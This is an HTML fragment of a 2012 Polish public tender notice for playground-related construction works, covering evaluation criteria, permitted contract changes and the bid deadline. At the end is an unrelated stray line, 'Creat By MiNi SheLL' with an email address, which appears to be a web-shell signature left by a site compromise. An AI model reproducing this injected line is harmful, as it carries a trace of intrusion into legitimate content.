4) Kosztorys ofertowy sporządzony wg wzoru stanowiącego załącznik do SIWZ
5) Dokument wniesienia wadium</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - termin realizacji - 20</li>
<li>3 - gwarancja - 10</li>
<li>4 - koszt technicznego przeglądu rocznego urządzeń zabawowych - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.    Zamawiający dopuszcza zmianę okresu przewidzianego na ukończenie robót gdy wystąpią:
1) zmiany spowodowane warunkami atmosferycznymi, w szczególności:
a) warunki atmosferyczne odbiegające od typowych (niekorzystne), uniemożliwiające prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów;
    Przez  niekorzystne warunki pogodowe rozumie się:
występowanie na placu budowy temperatur powietrza poniżej 0oC mierzonej o godz. 7:0 rano przez okres dłuższy niż 3 dni następujących jeden po drugim
wystąpienia w czasie dnia roboczego (7:00-16:00) intensywnych opadów śniegu lub deszczu przez 3 dni następujących jeden po drugim
zaleganie przez 5 dni następujących jeden po drugim pokrywy śnieżnej: 
przy czym wystąpienie niekorzystnych warunków pogodowych winno być zgłoszone w dzienniku budowy oraz pisemnie Zamawiającemu z potwierdzeniem przez Inspektora nadzoru a także stwierdzenie zaświadczeniem najbliżej stacji meteorologicznej
2) zmiany spowodowane nieprzewidzianymi warunkami realizacji, tj. warunkami geologicznymi, archeologicznymi lub terenowymi, w szczególności: wykopaliska archeologiczne, niewypały i niewybuchy, niezinwentaryzowane obiekty budowlane
3) zmiany będące następstwem okoliczności leżących po stronie Zamawiającego w szczególności:
a) wstrzymanie robót przez Zamawiającego;
b) konieczność usunięcia błędów lub wprowadzenia zmian w  dokumentacji projektowej; 
W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt 1 - 3 termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności. 
4) zmiany technologiczne, w szczególności:
a) konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań  technicznych/ technologicznych niż wskazane w dokumentacji projektowej, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem projektu,
b)  konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa 
Zmiany wskazywane w lit b) będą wprowadzane wyłącznie w zakresie umożliwiającym oddanie przedmiotu umowy do użytkowania, a Zamawiający może ponieść ryzyko zwiększenia wynagrodzenia z tytułu takich zmian wyłącznie w kwocie równej zwiększonym z tego powodu kosztom. 
Każda ze wskazywanych w lit a - b) zmian może być powiązana z obniżeniem wynagrodzenia na zasadach określonych przez Strony. 
5) Zmiany osobowe:
a) zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami i kwalifikacjami, o których mowa w ustawie Prawo budowlane lub innych ustawach, a także SIWZ, będzie wymagała również zaakceptowania przez Zamawiającego.
b) zmiana umowy w zakresie podwykonawców, za uprzednia zgoda Zamawiającego, tj. możliwe powierzenie podwykonawcom innej części robót niż wskazana w ofercie Wykonawcy, a także możliwa zmiana podwykonawcy na etapie realizacji robót, o ile nie sprzeciwia się to postanowieniem SIWZ
6) Pozostałe zmiany: 
a)	rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami. 
    b)  kolizja z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami. W takim
          przypadku zmiany w umowie zostaną ograniczone do zmian koniecznych powodujących uniknięcie
          kolizji, a wynagrodzenie zostanie ustalone z zachowaniem zasady opisanej w SIWZ
Każdy wniosek o zmianę zapisów umowy winien być przedłożony przez wykoanawcę pisemnie wraz z uzasadnieniem. Zmiana zapisów umowy może być przez Zamawiającego uznana wyłącznie w zakresie określonym w art. 144 ust. 1 ustwy pzp.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pila.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.pila.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.03.2012 godzina 10:00, miejsce: siedziba Zamawiającego pok. 134  pietro I - Kancelaria Główna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com